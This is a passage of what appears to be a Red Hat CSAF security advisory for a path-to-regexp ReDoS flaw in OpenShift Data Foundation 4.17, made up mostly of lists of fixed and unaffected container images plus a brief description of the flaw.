"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2310908"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in path-to-regexp package, where it turns path strings into regular expressions. In certain cases, path-to-regexp will output a regular expression that can be exploited to cause poor performance. Because JavaScript is single-threaded and regex matching runs on the main thread, poor performance will block the event loop and lead to a denial of service (DoS).",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "path-to-regexp: Backtracking regular expressions cause ReDoS",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x"
],
"known_not_affected": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
